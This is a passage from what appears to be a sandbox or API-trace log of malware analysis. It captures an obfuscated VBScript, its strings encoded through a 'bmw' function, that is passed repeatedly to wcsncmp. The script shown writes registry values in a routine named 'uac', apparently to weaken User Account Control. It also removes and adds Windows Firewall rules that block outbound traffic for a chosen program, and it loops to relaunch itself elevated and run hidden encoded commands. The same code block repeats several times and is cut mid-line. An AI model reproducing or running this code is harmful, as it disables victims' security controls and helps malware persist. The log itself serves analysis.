bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0226.334] wcsncmp (_String1="mw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.335] wcsncmp (_String1="w(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.335] wcsncmp (_String1="(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.335] wcsncmp (_String1="\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.335] wcsncmp (_String1="LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 